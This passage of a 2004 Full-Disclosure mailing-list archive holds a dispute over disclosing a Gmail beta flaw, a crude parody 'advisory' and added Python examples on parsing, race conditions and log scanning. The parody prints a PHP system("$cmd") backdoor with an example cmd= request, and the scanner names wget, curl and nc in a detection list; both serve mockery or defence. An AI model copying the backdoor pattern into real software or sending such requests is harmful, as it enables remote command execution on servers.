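        raise BadRequest(f"unsupported method {method}")
    return RequestLine(method, target, int(major), int(minor))


def handle_request_line(raw: bytes) -> Tuple[int, Optional[RequestLine]]:
    """Return (status, parsed). Rewriting and cookie logic run only on a
    RequestLine, never on the raw bytes, so they cannot see a missing field."""
    try:
        return 200, parse_request_line(raw)
    except BadRequest:
        return 400, None


if __name__ == "__main__":
    # Constructed sample request lines.
    for sample in (b"GET / HTTP/1.1\r\n", b"GET\n", b"GET /index.html\r\n",
                   b"G\xb4ET / HTTP/1.1\r\n"):
        print(sample, "->", handle_request_line(sample))
```

The design point is the type boundary: every stage after parsing receives a `RequestLine` whose three fields are guaranteed present, so a missing target cannot reach code that dereferences it. Whether the proxy the advisory names crashed for exactly that reason is not stated on the page; the example only shows where such an input should be stopped.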
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: System Outage (system_outage@yahoo.com)
Date: Mon Jul 05 2004 - 11:00:20 CDT
If it's about posting advisories, why do many decide to post the exploit along with the advisory? To me this is not a responsible thing to do. Who knows how many script kiddies are sleeping on this list and taking advantage of the free exploit giveaways seen here.
10 days isn't an awful long time and the vendor never made primary contact with the user in question. Meaning, for whatever reason the e-mail may not have been delivered, and because of this the Gmail Team could easily have been caught short on this issue and a serious hole exposed to the public, before the vendor (Gmail) has had a chance to scramble together an incident response and get the hole patched out, before a serious number of accounts become compromised on the service.
There is a difference between responsible "Full Disclosure" and irresponsible "Full Disclosure".
Cheerio
Tremaine <tremaine@gmail.com> wrote:
It's about posting security advisories. The initial poster advises
they notified the gmail team, and posted this advisory 10 days later.
It is immaterial whether an application is in alpha, beta or
production. If the software or application is in use outside the
development team, and there is a security issue, it is relevant to
this list.
It's called Full Disclosure for a reason... not partial disclosure,
not disclosure of production applications only... Full Disclosure.
If you want partial disclosure, you may need to rethink your
subscription to the list.
--
Tremaine
IT Security Consultant
----- Original Message -----
From: System Outage
Date: Mon, 5 Jul 2004 06:46:42 -0700 (PDT)
Subject: Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
To: full-disclosure@lists.netsys.com
If it's not about respect then what is it about?
You have no respect for the Gmail Team, that's for sure.
I guess this list isn't about respect...
It's about kiddies posting advisories and exploits for fun and little
care for the vendor(s).
Cheerio
amforward@mailsurf.com wrote:
System Outage wrote:
|The correct channel to post such "bugs" is the Gmail contact link for "bug
|reports".
I have already contacted Gmail about 10 days ago, but I have not received any
replies till this moment.
|If you had waited until the Gmail dev team declared gmail a public release,
|you would have gained more respect in the security community scene.
I don't think this is about respect afterall.
Regards,
Ahmed Motaz
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: amforward@mailsurf.com
Date: Mon Jul 05 2004 - 12:33:10 CDT
System Outage wrote:
|...why do many decide to post the exploit along with the advisory.
I'd like to draw your attention to the fact that the accompanying code to the
advisories you talk about is usually not referred to as "exploits." These are
actually called "proof of concepts."
It's true some people misuse them, but these "exploits" do help greatly in
understanding the problem, finding more similar/related problems, and even
patching it/them.
|...a serious hole exposed to the public, before the vendor (Gmail) has had a
|chance to scramble together an incident response and get the hole patched
|out, before a serious number of account's become compromised on the service.
I agree with you. "Serious" holes should be reported to the vendor some time
before it's disclosed to public. Patience is a must in this case (not infinite
though). However, I don't think this applies to the thread we are talking
about. This is a vulnerability with very low severity. This is also a beta
service and you should use it at your own risk.
Aside from that,
I am, however, still concerned whether this vulnerability can be escalated to
higher severity. Could the same problem exist with other scripts? Can I edit my
profile, for example, and find someone else's profile, and perhaps his secret
answer?
Your thoughts are highly appreciated.
Regards,
Ahmed Motaz
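The CheckAvailability report earlier in this thread (answers to other users' queries coming back under load) and the question asked in this message (could the same problem exist in other scripts?) describe one defect class: per-request data kept on an object that concurrent requests share. The following is an added example, not Gmail's code; the checker classes, field names and sample usernames are constructed to show the pattern. `UnsafeChecker` stores the current request's username and last name on a shared instance, `SafeChecker` keeps them in locals, and a `threading.Barrier` forces the interleaving so the leak reproduces every run instead of depending on timing.

```python
import threading
from typing import Dict, List, Optional, Tuple

# Added example, not Gmail's code. Two username-availability handlers: one
# stashes request fields on a shared object (the defect that would produce
# the symptom reported in the thread), the other keeps them in locals.

TAKEN = frozenset({"alice", "bob", "carol"})          # constructed sample data
Request = Tuple[str, str]                                # (username, lastname)
SAMPLE_REQUESTS: List[Request] = [("alice", "Smith"), ("bob", "Jones"), ("dave", "Brown")]


def suggest(username: str, lastname: str) -> Dict[str, object]:
    """Availability answer for one request."""
    if username in TAKEN:
        return {"available": False, "suggestion": f"{username}.{lastname.lower()}"}
    return {"available": True, "suggestion": username}


class UnsafeChecker:
    """One instance serves every thread and stores request data on itself."""

    def __init__(self) -> None:
        self.username: Optional[str] = None
        self.lastname: Optional[str] = None

    def handle(self, username: str, lastname: str,
               sync: Optional[threading.Barrier] = None) -> Dict[str, object]:
        self.username = username          # shared across requests: the defect
        self.lastname = lastname
        if sync is not None:
            sync.wait()                   # other requests overwrite the fields here
        return suggest(self.username, self.lastname)


class SafeChecker:
    """Request data never touches shared state."""

    def handle(self, username: str, lastname: str,
               sync: Optional[threading.Barrier] = None) -> Dict[str, object]:
        if sync is not None:
            sync.wait()                   # same pause, nothing to overwrite
        return suggest(username, lastname)


def run_concurrently(checker, requests: List[Request]) -> List[Dict[str, object]]:
    """Issue all requests at once. The barrier releases no thread until every
    thread has written its fields, so the unsafe reads all see the last writer."""
    barrier = threading.Barrier(len(requests))
    results: List[Optional[Dict[str, object]]] = [None] * len(requests)

    def worker(i: int, user: str, last: str) -> None:
        results[i] = checker.handle(user, last, barrier)

    threads = [threading.Thread(target=worker, args=(i, u, l))
               for i, (u, l) in enumerate(requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def count_leaks(requests: List[Request], results) -> int:
    """A response leaks when it was built from someone else's username."""
    return sum(1 for (user, _), r in zip(requests, results)
               if not str(r["suggestion"]).startswith(user))


if __name__ == "__main__":
    for cls in (UnsafeChecker, SafeChecker):
        res = run_concurrently(cls(), SAMPLE_REQUESTS)
        print(cls.__name__, res, "leaks:", count_leaks(SAMPLE_REQUESTS, res))
```

With three distinct usernames the unsafe handler always returns two responses built from another requester's data (all threads read whichever write landed last), and the safe one returns none. The same check, run against any handler that keeps request fields on a shared object, is a cheap way to answer the "other scripts" question without waiting for production load to expose it.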
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: Rodrigo Barbosa (rodrigob@suespammers.org)
Date: Mon Jul 05 2004 - 12:06:34 CDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Mon, Jul 05, 2004 at 09:00:20AM -0700, System Outage wrote:
> There is a difference between responsible "Full Disclosure" and irresponsible
> "Full Disclosure".
Responsible ... That's rich. From someone who posts anonymously,
from yahoo.com. Not to mention a very professional name of "System
Outage".
Why are you people even replying to this guy ?
- --
Rodrigo Barbosa <rodrigob@suespammers.org>
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)
iD8DBQFA6YqapdyWzQ5b5ckRAnbNAJ9JnbpYygo19XmSYh8RAq5Cdwdp1wCgpsQG
63V+32iD5s7FTC0+r3zqEAc=
=Cxid
-----END PGP SIGNATURE-----
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: Eric LeBlanc (inouk@igt.net)
Date: Mon Jul 05 2004 - 12:42:14 CDT
On Mon, 5 Jul 2004, System Outage wrote:
> If it's about posting advisories, why do many decide to post the exploit along with the advisory. To me this is not a responsible thing to do. Whoever knows how many script kiddies are sleeping on this list and taking advantage of the free exploit giveaway's seen here.
>
> 10 days isn't an awful long time and the vendor never made primary contact with the user in question. Meaning, for whatever reason the e-mail may not have been delivered and because of this the Gmail Team could easily of been caught short on this issue and a serious hole exposed to the public, before the vendor (Gmail) has had a chance to scramble together an incident response and get the hole patched out, before a serious number of account's become compromised on the service.
>
> There is a difference between responsible "Full Disclosure" and irresponsible "Full Disclosure".
>
>
> Cheerio
>
> Tremaine <tremaine@gmail.com> wrote:
> It's about posting security advisories. The initial poster advises
> they notified the gmail team, and posted this advisory 10 days later.
>
> It is immaterial whether an application is in alpha, beta or
> production. If the software or application is in use outside the
> development team, and there is a security issue, it is relevant to
> this list.
>
>
> It's called Full Disclosure for a reason... not partial disclosure,
> not disclosure of production applications only... Full Disclosure.
>
> If you want partial disclosure, you may need to rethink your
> subscription to the list.
>
>
>
> --
> Tremaine
> IT Security Consultant
>
I agree with "System Outage". Gmail clearly told us that their website is
in BETA stage.
For me, when software is in 'BETA' (or 'ALPHA'), we SHOULD expect that
this software MAY HAVE security holes. That's why they want us to test
this site before going to the public release, and it's our job to notify
the gmail team of all bugs AND security holes we may find. As long as
this website is in beta stage, all advisories that someone may send to this
list or elsewhere are NOT considered 'Security Advisories' for me.
The original author may not receive answers from the Gmail Team, but this
site is NOT IN PRODUCTION. When the gmail site is official and this
bug is still there, NOW you can publish your security advisory.
Furthermore, the best people for testing the software (bugs and security
holes) are the public. They can do many things which we would never have
thought of or imagined.
BTW, I'm sure that the Gmail developers expect that the public will find
some security holes...
If we must publish all security advisories about beta software, this list
will be flooded...
E.
--
Eric LeBlanc
inouk@igt.net
--------------------------------------------------
UNIX is user friendly.
It's just selective about who its friends are.
==================================================
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: System Outage (system_outage@yahoo.com)
Date: Mon Jul 05 2004 - 12:57:31 CDT
It's against my morals to give tips on how to hack, exploit or compromise Gmail on a public mailing list, which could assist malicious users to further destroy the service.
However, I welcome users to compromise my Gmail account. My address is system.outage@gmail.com
I suspect I won't have that account for very much longer. Happy hacking.
Cheerio
amforward@mailsurf.com wrote:
System Outage wrote:
|...why do many decide to post the exploit along with the advisory.
I'd like to draw your attention to the fact that the accompanying code to the
advisories you talk about is usually not referred to as "exploits." These are
actually called "proof of concepts."
It's true some people misuse them, but these "exploits" do help greatly in
understanding the problem, finding more similar/related problems, and even
patching it/them.
|...a serious hole exposed to the public, before the vendor (Gmail) has had a
|chance to scramble |together an incident response and get the hole patched
|out, before a serious number of account's |become compromised on the service.
I agree with you. "Serious" holes should be reported to the vendor some time
before it's disclosed to public. Patience is a must in this case (not infinite
though). However, I don't think this applies to the thread we are talking
about. This is a vulnerability with very low severity. This is also a beta
service and you should use it at your own risk.
Aside from that,
I am, however, still concerned whether this vulnerability can be escalated to
higher severity. Could the same problem exist with other scripts? Can I edit my
profile, for example, and find someone else's profile, and perhaps his secret
answer?
Your thoughts are highly appreciated.
Regards,
Ahmed Motaz
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: Tremaine (tremaine@gmail.com)
Date: Mon Jul 05 2004 - 13:22:54 CDT
On Mon, 5 Jul 2004 13:42:14 -0400 (EDT), Eric LeBlanc <inouk@igt.net> wrote:
> On Mon, 5 Jul 2004, System Outage wrote:
> > Tremaine <tremaine@gmail.com> wrote:
> > It's about posting security advisories. The initial poster advises
> > they notified the gmail team, and posted this advisory 10 days later.
> >
> > It is immaterial whether an application is in alpha, beta or
> > production. If the software or application is in use outside the
> > development team, and there is a security issue, it is relevant to
> > this list.
> >
> >
> > It's called Full Disclosure for a reason... not partial disclosure,
> > not disclosure of production applications only... Full Disclosure.
> >
> > If you want partial disclosure, you may need to rethink your
> > subscription to the list.
> >
> >
> >
> > --
> > Tremaine
> > IT Security Consultant
> >
>
> I agree with "System Outage". Gmail clearly told us that their website is
> in BETA stage.
>
> For me, when a software is in 'BETA' (or 'ALPHA'), we SHOULD expect that
> this software MAY HAVE security holes. That's why they want us to test
> this site before going to the public release, and it's our job to notify
> to the gmail team all bugs AND security holes we may find. As long as
> this website is in beta stage, all advisory that someone may send in this
> list or elsewhere are NOT considered 'Security Advisory' for me.
>
> The original author may not receive answers from the Gmail Team, but this
> site is NOT IN PRODUCTION. When gmail site will be official and when this
> bug is still there, NOW you can publish your security advisory.
>
> Futhermore, the best people for testing the software (bugs and security
> holes) is the public. They can do many things which we will never
> thought or imagined.
>
> BTW, I'm sure that the Gmail developers expect that the public will find
> some security holes...
>
> If we must publish all security advisorys about beta software, this list
> will be flooded...
>
> E.
> --
> Eric LeBlanc
> inouk@igt.net
> --------------------------------------------------
> UNIX is user friendly.
> It's just selective about who its friends are.
> ==================================================
I think this may be one of those instances where we'll have to agree
to disagree. Certainly I would take a dim view if the original poster
hadn't notified gmail in advance of their advisory to FD. I do not
however believe that beta software that is in widespread use should
be excluded from public scrutiny and notification. Gmail was not
released simply to a select few, it has been opened up via gmail
invites to widespread usage, and is being profited from via targeted
commercial advertising.
The advisory also may point towards other coding issues in Google
itself, which can then be investigated based on the information.
Anyhow, as I noted above I think we may just have different uses and
expectations of FD, and I for one don't have an issue like this one
brought out.
Cheers,
--
Tremaine
IT Security Consultant
[Full-Disclosure] RS-2004-2: "Content-Type" XSS vulnerability affecting other webmail systems
From: Roman Medina-Heigl Hernandez (roman@rs-labs.com)
Date: Mon Jul 05 2004 - 13:28:16 CDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hello,
On 29.May.2004, I disclosed an important XSS vulnerability in latest
versions of a well-known webmail: SquirrelMail. Upon publication I
received the notice that other important webmails were also vulnerable
to the same bug. Indeed the same exploits released for SquirrelMail
worked without any changes in these systems. I decided to contact
several other webmail vendors and ask directly to check their software
and confirm or deny the vulnerability.
The purpose of this brief advisory is to provide you with the
collected info in an objective and summarized way.
PS: Sorry for the big delay.
Saludos,
--Roman
- --
PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
iQA/AwUBQOmPneR/in3q1WdCEQKHUQCfaNoy7mu+g0AKsK9LFiwVyT5zXJEAoIzW
h0imdE0FayaQLIFBiX47hpHW
=9k38
-----END PGP SIGNATURE-----
- text/plain attachment: RS-Labs-Advisory-2004-2.txt
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: Maarten (fulldisc@ultratux.org)
Date: Mon Jul 05 2004 - 13:55:12 CDT
On Monday 05 July 2004 18:00, System Outage wrote:
> If it's about posting advisories, why do many decide to post the exploit
> along with the advisory. To me this is not a responsible thing to do.
> Whoever knows how many script kiddies are sleeping on this list and taking
> advantage of the free exploit giveaway's seen here.
Can we please not have this discussion again ? Even IF you have a valid
point, this list was conceived to include PoC code, despite the possible evil
consequences. Read the list archives for lots more discussion on this.
> 10 days isn't an awful long time and the vendor never made primary contact
> with the user in question. Meaning, for whatever reason the e-mail may not
> have been delivered and because of this the Gmail Team could easily of been
> caught short on this issue and a serious hole exposed to the public, before
> the vendor (Gmail) has had a chance to scramble together an incident
> response and get the hole patched out, before a serious number of account's
> become compromised on the service.
Ten days is more than enough for them to answer "Yes we received your mail /
Yes we're looking into it, it will take some time before we have an update."
Maybe not for microsoft, but what can you do when you receive no reply at all?
And if the email actually did not reach them, all the more reason to post to
this list. How else do you suggest that people become aware of an issue?
Besides, the hole isn't that serious, so where's the fire anyway ?
Maarten
--
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER
[Full-Disclosure] ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3 BETA (used by 3 peoples on internet) !!! 0DAY EXPLOIT !
From: frogman@no-log.org
Date: Mon Jul 05 2004 - 14:20:24 CDT
This is IHCTEAM material. We fuck blackhats and we own the planet. This is
a leet advisory, s0 l33t. Just read it and be quiet.
---------------------------
IHC TEAM private work, all the fame become to IHC TEAM and the leetest mr.
Frog-m@n !!!!
Product: PHP
Version: all
Security level: Very high baby !!!
What's the problem ?
==================
There is a BIG 1337 BUG 0day in all the php versions for ever never. This
bug is caused by
the system() function. This is a very VERY 3v1l backdoor, that allows
execution of
arbitrary shell command. This backdoor has been coded by ZyXyS from HACK3R
c0rp0r4ti0n (c) (TM) (R).
Because we want fame, we'll explain you da bug:
l00k at th1s 3v1l code:
<?
system("$cmd");
?>
*TADAAAA* !
If this code is on a webserver, a malicious user (like ZyXyS) can exec
EVERYTHING and own EVERYWHERE.
Example:
www.thc-is-lame.org/page.php?cmd=ls%20/tmp
It will give you:
tmp-shells-owned-with-THC-Hydra-fucking-lame-kiddy-tool.txt
adore.tar.gz
last-10-leaked-exploits.tar.gz
You see, you can rock.
So, at this point we can see that ZyXyS is a very leet guy: THIS BACKDOOR
is less detectable than
a LKM BACKDOOR like adore.tar.gz (<--- hahaha).
I release this vulnerability because the K-otik team (www.k-otik.com)
owned ZyXyS 10 days ago
(after the fbi) and discovered the backdoor, and k-otik wanted to write an
advisory, ONLY FOR FAME
AND MONEY. I want this fame (but for the money, I don't mind, I am rich
because I sell 0day,
traded on #darknet, to idefense), so I had to release the bug before K-otik.
k-otik is like hack.co.za, they release everything and nothing, but they
can't code their own exploit.
Greets:
======
Rudolf Polzer (divzero@gmail.com): Thank to his idea to disclose this bug
and if you have another idea
for us mail me
packetstormsecurity: they give us kiddie-friendly exploits and mass rooters
spender: he sells good security patches
isec: now my grandmother can r00t linux boxes
bugtraq: they leak bugs found by ugly blackhats, which worked a lot of
time to discover them
espionet guys: they represented very well the hacker scene in a TV show
with their netbus
(please don't open my cdrom device guys)
Fame:
====
We already owned everyone and everything with these exploits years ago,
and in
fact we've all had them sitting on the shelf gathering dust due to lack of
new targets.
FUN TESTED IDEAS:
www.team-teso.net (down because of us)
www.thc.org (haha owned 10 times)
www.securityfocus.com
It was very funny to read .gov and .mil files.
WARNING !!!
/!\ WE ARE LOOKING FOR A JOB IN THE SECURITY RESEARCH /!\
Visit us:
www.ihcteam.com
www.newffr.com
www.espionet.net
www.underground-fr.org
www.phpsecure.com
---------------------------
We n33d f4me, m0n3y, g1rls and m0nk3ys, so VIVA EL DISCLOSURO.
---- fr0g-m@n ----
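The page.php?cmd= pattern in the post above, seen from the defender's side: every request to such a page leaves its command in the web server's access log. The following is an added example (not code from the post or its author) that scans combined-format log lines and reports query parameters whose decoded value looks like a shell command; the parameter names, the utility list and the log lines are constructed for the example.

```python
"""Flag likely OS command injection attempts in web-server access logs."""
import re
from urllib.parse import parse_qsl, urlsplit

# host ident user [time] "METHOD TARGET PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) '
)
# Characters that chain or substitute commands in a shell (a lone "$" is left
# out; it is common in legitimate values such as prices).
SHELL_META = re.compile(r'[;&|`<>]|\$\(|\$\{')
# Parameter names that hand their value straight to the shell in the post's
# page.php; extend with names from your own applications (assumption).
SUSPICIOUS_PARAMS = frozenset({"cmd", "command", "exec", "system", "shell"})
# Utilities that typically open an injected command (constructed list).
SHELL_BINARIES = frozenset({"ls", "cat", "id", "uname", "wget", "curl", "nc",
                            "sh", "bash", "rm", "chmod", "find"})


def parse_line(line):
    """Return (host, time, method, target, status) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return (m.group("host"), m.group("time"), m.group("method"),
            m.group("target"), int(m.group("status")))


def reasons_for(name, value):
    """List why a decoded query parameter looks like a shell command (empty if it does not)."""
    reasons = []
    if name.lower() in SUSPICIOUS_PARAMS and value.strip():
        reasons.append("param-name")
    if SHELL_META.search(value):
        reasons.append("shell-metachar")
    tokens = value.split()
    # A leading utility name alone is weak evidence ("ls of items" typed into a
    # search box is harmless), so require another reason or a path-like argument.
    if tokens and tokens[0] in SHELL_BINARIES and (reasons or "/" in value):
        reasons.append("shell-binary")
    return reasons


def scan_target(target):
    """Decode the query string of a request target and return suspicious parameters."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        reasons = reasons_for(name, value)
        if reasons:
            findings.append({"param": name, "value": value, "reasons": reasons})
    return findings


def scan(lines):
    """Run scan_target over every parseable log line; malformed lines are skipped, not fatal."""
    results = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        host, when, _method, target, status = parsed
        for finding in scan_target(target):
            results.append({"host": host, "time": when, "target": target,
                            "status": status, **finding})
    return results


SAMPLE_LOG = [  # constructed lines, not from any real server
    '10.0.0.5 - - [05/Jul/2004:18:06:54 -0500] "GET /page.php?cmd=ls%20/tmp HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '10.0.0.5 - - [05/Jul/2004:18:07:10 -0500] "GET /page.php?cmd=cat%20/etc/hostname%3Bid HTTP/1.1" 200 64 "-" "Mozilla/4.0"',
    '10.0.0.9 - - [05/Jul/2004:18:08:00 -0500] "GET /page.php?id=42 HTTP/1.1" 200 311 "-" "Mozilla/4.0"',
    '10.0.0.9 - - [05/Jul/2004:18:08:30 -0500] "GET /search.php?q=ls%20of%20items HTTP/1.1" 200 311 "-" "Mozilla/4.0"',
    '10.0.0.7 - - [05/Jul/2004:18:09:00 -0500] "GET /search.php?q=ls%20/tmp HTTP/1.1" 200 311 "-" "Mozilla/4.0"',
    'not a log line at all',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["host"]} {hit["time"]} {hit["param"]}={hit["value"]!r} {hit["reasons"]}')
```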
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: Maarten (fulldisc@ultratux.org)
Date: Mon Jul 05 2004 - 14:09:53 CDT
On Monday 05 July 2004 19:42, Eric LeBlanc wrote:
> On Mon, 5 Jul 2004, System Outage wrote:
> I agree with "System Outage". Gmail clearly told us that their website is
> in BETA stage.
Beta, alpha, released, yada yada. Gmail is OPEN for the public, albeit you
need "an invitation". Thus, enough reason to disclose security holes.
> For me, when a software is in 'BETA' (or 'ALPHA'), we SHOULD expect that
> this software MAY HAVE security holes. That's why they want us to test
> this site before going to the public release, and it's our job to notify
> to the gmail team all bugs AND security holes we may find. As long as
> this website is in beta stage, all advisory that someone may send in this
> list or elsewhere are NOT considered 'Security Advisory' for me.
Hm. By that standard, we could not ever disclose stuff about microsoft
software. Cause their stuff is indefinitely beta, hahaha. ;-)
> The original author may not receive answers from the Gmail Team, but this
> site is NOT IN PRODUCTION. When gmail site will be official and when this
> bug is still there, NOW you can publish your security advisory.
So, the solution to having embarrassing security problems published is never
declare the program "Released". Can someone please tell microsoft? They'd be
real interested to declare IE and Outlook beta-software forever in that case.
> Furthermore, the best people for testing the software (bugs and security
> holes) is the public. They can do many things which we will never
> thought or imagined.
Well now, isn't this e x a c t l y what's happening here ?
> BTW, I'm sure that the Gmail developers expect that the public will find
> some security holes...
>
> If we must publish all security advisories about beta software, this list
> will be flooded...
The very reason to HAVE a beta test phase is to find and flush out bugs early.
Doing that, the released program can be as flawless as can be. So when would
you suggest disclosing bugs is a good time ? Release date being too late...
Maarten
--
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: System Outage (system_outage@yahoo.com)
Date: Mon Jul 05 2004 - 14:07:33 CDT
I fully agree with you on this topic. I found it hard to believe users were posting advisories for Gmail before public release. In my view all issues should be directed to Gmail and, if the user wishes to use lists such as FD, the user should wait until the service is available to the public and then, perhaps, send it to FD for discussion.
The user could also state the discovery date and various other timeline dates, to give the user some better acknowledgement in the advisory. This will prove (if the user wishes it to be known) they did find the hole at the Beta stage and that Gmail let it slip through the net.
I suspect -a lot- of vulnerabilities will come to light the week that Gmail makes the service public. I think a lot of users are holding back until then; I may be wrong though.
Cheerio
Eric LeBlanc <inouk@igt.net> wrote:
I agree with "System Outage". Gmail clearly told us that their website is
in BETA stage.
For me, when a software is in 'BETA' (or 'ALPHA'), we SHOULD expect that
this software MAY HAVE security holes. That's why they want us to test
this site before going to the public release, and it's our job to notify
to the gmail team all bugs AND security holes we may find. As long as
this website is in beta stage, all advisory that someone may send in this
list or elsewhere are NOT considered 'Security Advisory' for me.
The original author may not receive answers from the Gmail Team, but this
site is NOT IN PRODUCTION. When gmail site will be official and when this
bug is still there, NOW you can publish your security advisory.
Furthermore, the best people for testing the software (bugs and security
holes) is the public. They can do many things which we will never
thought or imagined.
BTW, I'm sure that the Gmail developers expect that the public will find
some security holes...
If we must publish all security advisories about beta software, this list
will be flooded...
E.
--
Eric LeBlanc
inouk@igt.net
--------------------------------------------------
UNIX is user friendly.
It's just selective about who its friends are.
==================================================
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: Geoff Shively (gshively@pivx.com)
Date: Mon Jul 05 2004 - 14:04:35 CDT
Full disclosure... True. Nobody is taking issue with the content, just the timing.
10 days is an unreal expectation. Though 10 days may feel like a long time to you sir, it whizzes by inside of a growth company such as Google.
This type of disclosure is where the motivation for OIS comes from. I am not saying I agree with the OIS 'partner' agendas or their execution- though there is some genuine interest in setting basic guidelines based on industry experience, not regulating research or its byproducts (imho not gunna happen). So where is the middle ground as it applies to research?
Cheers,
Geoff Shively
Chief Scientist, Founder
PivX Solutions, Inc.
23 Corporate Plaza #280
Newport Beach, CA 92660
http://www.pivx.com
gshively@pivx.com
Ticker: PIVX.OB
Mobile: 949.903.8856
-----Original Message-----
From: Tremaine <tremaine@gmail.com>
To: System Outage <system_outage@yahoo.com>
CC: full-disclosure@lists.netsys.com <full-disclosure@lists.netsys.com>
Sent: Mon Jul 05 07:46:16 2004
Subject: Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
It's about posting security advisories. The initial poster advises
they notified the gmail team, and posted this advisory 10 days later.
It is immaterial whether an application is in alpha, beta or
production. If the software or application is in use outside the
development team, and there is a security issue, it is relevant to
this list.
It's called Full Disclosure for a reason... not partial disclosure,
not disclosure of production applications only... Full Disclosure.
If you want partial disclosure, you may need to rethink your
subscription to the list.
--
Tremaine
IT Security Consultant
----- Original Message -----
From: System Outage <system_outage@yahoo.com>
Date: Mon, 5 Jul 2004 06:46:42 -0700 (PDT)
Subject: Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
To: full-disclosure@lists.netsys.com
If it's not about respect then what is it about?
You have no respect for the Gmail Team, that's for sure.
I guess this list isn't about respect...
It's about kiddies posting advisories and exploits for fun and little
care for the vendor(s).
Cheerio
amforward@mailsurf.com wrote:
System Outage wrote:
|The correct channel to post such "bugs" is the Gmail contact link for "bug
|reports".
I have already contacted Gmail about 10 days ago, but I have not received any
replies till this moment.
|If you had waited until the Gmail dev team declared gmail a public release,
|you would have gained more respect in the security community scene.
I don't think this is about respect after all.
Regards,
Ahmed Motaz
Re: [Full-Disclosure] Gmail/Yahoo!
From: System Outage (system_outage@yahoo.com)
Date: Mon Jul 05 2004 - 14:54:05 CDT
Yeah, I've contacted the Yahoo! Security Team over the past 1/2 years with various issues that they -did- follow up and patch, but did not once think to tell me about progress. It was only after I spoke to a representative of Yahoo! Security and said I was going to post all the underground security issues with Yahoo! to FD, that I received an e-mail to say sorry that we didn't contact you. We've been reading -all- mails and we've been taking further action(s), after all this time.
I thought Yahoo! Security had been ignoring me, but the issues were being patched and that's all that matters at the end of the day. Although I did think it was bad mannered of Yahoo! representatives to treat users who provide them with valuable information, to be felt like 2nd class.
I guess the same may apply for Google Security Team. After all, Yahoo! and Google were very good partners, up until recently. Google and Yahoo! seem to have very quickly become rivals, with regards to Search and E-mail.
The things I could tell FD about Yahoo! would rock the Yahoo! Security Team to its foundations (and they know it). Luckily for them, I have morals.
Yahoo! are aware of who I am, even though they know me on another alias.
Cheerio
Maarten <fulldisc@ultratux.org> wrote:
On Monday 05 July 2004 18:00, System Outage wrote:
> If it's about posting advisories, why do many decide to post the exploit
> along with the advisory. To me this is not a responsible thing to do.
> Whoever knows how many script kiddies are sleeping on this list and taking
> advantage of the free exploit giveaways seen here.
Can we please not have this discussion again ? Even IF you have a valid
point, this list was conceived to include PoC code, despite the possible evil
consequences. Read the list archives for lots more discussion on this.
> 10 days isn't an awful long time and the vendor never made primary contact
> with the user in question. Meaning, for whatever reason the e-mail may not
> have been delivered and because of this the Gmail Team could easily have been
> caught short on this issue and a serious hole exposed to the public, before
> the vendor (Gmail) has had a chance to scramble together an incident
> response and get the hole patched out, before a serious number of accounts
> become compromised on the service.
Ten days is more than enough for them to answer "Yes we received your mail /
Yes we're looking into it, it will take some time before we have an update."
Maybe not for microsoft, but what can you do when you receive no reply at all?
And if the email actually did not reach them, all the more reason to post to
this list. How else do you suggest that people become aware of an issue?
Besides, the hole isn't that serious, so where's the fire anyway ?
Maarten
--
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: Eric LeBlanc (inouk@igt.net)
Date: Mon Jul 05 2004 - 15:38:03 CDT
On Mon, 5 Jul 2004, Maarten wrote:
> Hm. By that standard, we could not ever disclose stuff about microsoft
> software. Cause their stuff is indefinitely beta, hahaha. ;-)
[ Other repeated stuff snipped ]
In your eyes maybe, but not in the eyes of Microsoft and serious
customers. Did you see the word 'BETA' in IE6 (or other software) when
you download from Microsoft (not in the developer section, but in public
release)? AFAIK, I have never seen that (in PUBLIC RELEASE I repeat).
Anyway, any serious company will never put beta software in a production
environment.
This is my last word in this list, because it's useless... Everyone has
its own opinion about this !
E.
--
Eric LeBlanc
inouk@igt.net
--------------------------------------------------
UNIX is user friendly.
It's just selective about who its friends are.
==================================================
Re: [Full-Disclosure] Gmail/Yahoo!
From: System Outage (system_outage@yahoo.com)
Date: Mon Jul 05 2004 - 16:01:52 CDT
My e-penis fux Yahoo! Security Team.
Cheerio
Geoffrey Huntley <ghuntley@gmail.com> wrote:
my e-penis is > your e-penis
Give it a break dude.
----- Original Message -----
From: System Outage
Date: Mon, 5 Jul 2004 12:54:05 -0700 (PDT)
